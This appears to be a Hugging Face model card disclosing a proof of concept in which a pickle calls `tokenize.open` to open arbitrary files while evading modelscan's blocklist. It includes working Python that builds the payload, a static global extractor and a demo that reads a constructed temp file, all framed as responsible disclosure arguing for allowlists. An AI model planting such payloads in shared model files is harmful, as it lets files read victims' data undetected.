Upload folder using huggingface_hub
1c00699 verified
---
license: mit
tags:
- security-research
- modelscan-bypass
---
# modelscan-bypass-tokenize-open
## Security Research — Modelscan Bypass PoC
**Severity**: HIGH
**Module**: `tokenize`
**Description**: File open via `tokenize.open()`, which is not on modelscan's blocklist, used in place of the blocked `builtins.open`.
**Impact**: Opens any file the loading process can read and returns a text-mode file object. `tokenize.open()` is a thin wrapper that calls `builtins.open(path, 'rb')` internally and wraps the result in a `TextIOWrapper`, so blocking `builtins.open` by name does nothing against it. One caveat: the encoding is detected from a BOM or a `coding:` cookie (default UTF-8), so a file whose first two lines are not decodable raises `SyntaxError` instead of being opened.
## Modelscan Result
```
$ modelscan scan -p pytorch_model.bin
No issues found! ✅ (FALSE NEGATIVE)
```
**Tested against**: modelscan 0.8.8 (latest release at the time of testing)
## How It Works
The pickle stream references `tokenize.open` as a global (a `GLOBAL` opcode for protocol 2/3, `STACK_GLOBAL` for protocol 4+) and invokes it with `REDUCE`. modelscan matches the `(module, name)` pairs a pickle imports against its blocklist of unsafe globals; `builtins.open` is on that list but `tokenize` is not, so the file scans clean.
When the file is loaded with `pickle.loads()` or `torch.load(..., weights_only=False)`, the unpickler resolves the global and calls it, opening the target file. Note that `torch.load()` with `weights_only=True` (the default since PyTorch 2.6) uses a restricted unpickler that refuses this global, so the payload only fires on the unrestricted load path.
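To make the bypass and the fix concrete, the following added example (my code, not the PoC author's or ProtectAI's) builds the `tokenize.open` pickle for both opcode forms, lists the globals it imports at opcode level with `pickletools` (no execution), and compares a blocklist verdict with an allowlist verdict. `ASSUMED_BLOCKLIST` and `ASSUMED_ALLOWLIST` are illustrative stand-ins and not modelscan's real rule set; the secret file is constructed in a temporary directory.

```python
"""Added example: tokenize.open pickle payload, static global extraction,
and blocklist vs allowlist verdicts. Rule sets below are assumptions."""
import os
import pickle
import pickletools
import tempfile
import tokenize

# Opcodes that push a str onto the unpickler stack (STACK_GLOBAL's operands).
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

# Assumed blocklist in the spirit of the page: blocks builtins.open by name.
ASSUMED_BLOCKLIST = {("builtins", "open"), ("builtins", "eval"),
                     ("builtins", "exec"), ("os", "system"),
                     ("subprocess", "Popen")}
# Assumed allowlist for a plain PyTorch state_dict (trimmed illustration).
ASSUMED_ALLOWLIST = {("collections", "OrderedDict"),
                     ("torch._utils", "_rebuild_tensor_v2"),
                     ("torch", "FloatStorage")}


class _TokenizeOpen:
    """Reduces to tokenize.open(path): pickling emits GLOBAL/STACK_GLOBAL
    for tokenize.open followed by REDUCE, and nothing else."""
    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (tokenize.open, (self.path,))


def build_payload(path, protocol=pickle.DEFAULT_PROTOCOL):
    """Protocol < 4 emits GLOBAL; protocol >= 4 emits STACK_GLOBAL."""
    return pickle.dumps(_TokenizeOpen(path), protocol=protocol)


def referenced_globals(data):
    """Statically list every (module, name) the pickle imports.

    Walks opcodes with pickletools.genops, so nothing runs. Tracks str pushes
    and a minimal memo so STACK_GLOBAL operands fetched via GET still resolve.
    """
    refs, strings, memo, top = set(), [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in STRING_OPS:
            strings.append(arg)
            top = arg
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            top = memo.get(arg)
            strings.append(top)
        elif name == "MEMOIZE":            # stores top of stack at next index
            memo[len(memo)] = top
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = top
        elif name == "GLOBAL":             # inline "module name" argument
            module, attr = arg.split(" ", 1)
            refs.add((module, attr))
            top = None
        elif name == "STACK_GLOBAL":       # operands are the two top strs
            if len(strings) < 2 or None in strings[-2:]:
                raise ValueError("STACK_GLOBAL without resolvable operands")
            attr, module = strings.pop(), strings.pop()
            refs.add((module, attr))
            top = None
        else:
            top = None
    return refs


def blocklist_scan(data):
    """Blocklist verdict: empty set is the 'No issues found' false negative."""
    return referenced_globals(data) & ASSUMED_BLOCKLIST


def allowlist_scan(data):
    """Allowlist verdict: anything outside the expected set is a finding."""
    return referenced_globals(data) - ASSUMED_ALLOWLIST


def demo():
    """Build both payload forms, scan them, then load one with the
    unrestricted unpickler to show the constructed file really is opened."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "secret.txt")
        with open(target, "w", encoding="utf-8") as f:
            f.write("constructed secret\n")   # constructed sample content
        p2, p4 = build_payload(target, 2), build_payload(target, 4)
        fh = pickle.loads(p4)                 # resolves and calls tokenize.open
        try:
            content = fh.read()
        finally:
            fh.close()
        return {
            "globals_p2": referenced_globals(p2),
            "globals_p4": referenced_globals(p4),
            "blocklist_findings": blocklist_scan(p4),
            "allowlist_findings": allowlist_scan(p4),
            "content_read": content,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The design point is the last two verdicts: the blocklist returns nothing for a pickle that opens an arbitrary file, while the allowlist flags `tokenize.open` without ever having heard of it, because a weights file has no business importing anything outside the handful of globals a tensor container needs.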
## Responsible Disclosure
This PoC is part of responsible security research submitted via the Huntr MFV program
to help ProtectAI improve modelscan's detection capabilities.